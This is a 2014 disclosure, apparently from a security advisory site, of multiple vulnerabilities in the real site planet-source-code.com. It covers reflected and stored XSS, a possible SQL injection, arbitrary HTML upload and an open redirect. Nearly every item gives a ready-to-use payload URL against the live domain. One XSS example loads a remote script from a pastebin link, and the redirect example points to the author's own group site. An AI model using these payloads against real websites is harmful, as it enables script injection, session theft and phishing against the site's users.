Planet Source Code XSS / SQL Injection / Shell Upload

2014.11.17
Credit: DevilScreaM
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79
CWE-264

#Title : Planet Source Code - Multiple Vulnerabilities #Author : DevilScreaM #Date : 15 November 2014 #Category : Web Applications #Vendor : http://planet-source-code.com #Greetz : newbie-security.or.id | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber | Madleets ============================================================================================ Remote Cross Site Scripting Location : vb/scripts/BrowseCategoryOrSearchResults.asp Parameter : txtCriteria Reference : https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet POC : http://planet-source-code.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria=[XSS+BYPASS_FILTERING] Example : http://planet-source-code.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria="><SCRIPT/SRC="http://pastebin.com/raw.php?i=sUHjCcQ1"></SCRIPT> =========================================================================================== Stored Cross Site Scripting POC : 1. You Must Register or Login to Planet-Source-Code 2. After Login, Go to Link : http://planet-source-code.com/vb/jobs/PostJob.asp?lngWId=8 Input your Script Cross Site Scripting at Textbox Job Title,Company,Description 3. View your Cross Script Scripting at : http://planet-source-code.com/vb/jobs/ListJobs.asp ============================================================================================= Cross Site Scripting Location : vb/scripts/voting/VoteLog.asp Parameter : txtCodeName POC : http://planet-source-code.com/vb/scripts/voting/VoteLog.asp?intUserRatingTotal=&lngWid=10&txtCodeName=[YOUR_XSS]&txtCodeId=9431&intNumOfUserRatings=0 Example : http://planet-source-code.com/vb/scripts/voting/VoteLog.asp?intUserRatingTotal=&lngWid=10&txtCodeName=<script>alert("DevilScreaM")</script>&txtCodeId=9431&intNumOfUserRatings=0 =============================================================================================== Possible SQL Injection Location : vb/jobs/ListJobs.asp Parameter : txtMaxNumberOfEntriesPerPage POC : http://planet-source-code.com/vb/jobs/ListJobs.asp?txtMaxNumberOfEntriesPerPage=10' ================================================================================================ Arbitrary File Upload POC : 1. You Must Register or Login to Planet Source Code 2. After Login, Go to Link http://planet-source-code.com/vb/authors/new_author_login.asp?lngWId=1&blnExisistingAuthor=TRUE 3. Upload your File TXT or HTML in Upload Button 4. After Upload File, see your file at : http://planet-source-code.com/Upload_PSC/AuthorPhotos/[RANDOME_NAME].html Example : http://planet-source-code.com/Upload_PSC/AuthorPhotos/AUTHOR_PHOTO201411151232354597.html ===================================================================================================== URL Redirection POC : http://planet-source-code.com/vb/authentication/DeleteCookies.asp?txtReturnURL=[URL] Example : http://planet-source-code.com/vb/authentication/DeleteCookies.asp?txtReturnURL=http://newbie-security.or.id/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top